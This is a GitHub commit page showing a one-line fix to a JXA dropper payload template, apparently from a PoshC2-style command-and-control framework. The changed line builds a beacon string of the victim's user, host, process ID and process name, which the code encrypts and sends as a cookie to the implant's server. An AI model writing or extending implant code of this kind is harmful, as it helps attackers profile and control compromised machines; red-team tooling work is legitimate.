Skip to content

Commit

Permalink
Update dropper_jxa.js
Browse files Browse the repository at this point in the history
  • Loading branch information
Luct0r authored Aug 8, 2022
1 parent 1db78ff commit 7b5a881
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion resources/payload-templates/dropper_jxa.js
Original file line number Diff line number Diff line change
Expand Up @@ -133,7 +133,7 @@ function primern(url) {
} else {
el = "";
}
let o = posh_implant.cu + el + ';' + posh_implant.host + ';' + posh_implant.pid ';' + posh_implant.procName +';#REPLACEURLID#';
let o = posh_implant.cu + el + ';' + posh_implant.host + ';' + posh_implant.pid + ';' + posh_implant.procName +';#REPLACEURLID#';
// Encrypt o and set as cookie
let cookie = enc(o);
primern = get_webclient(cookie);
Expand Down

0 comments on commit 7b5a881

Please sign in to comment.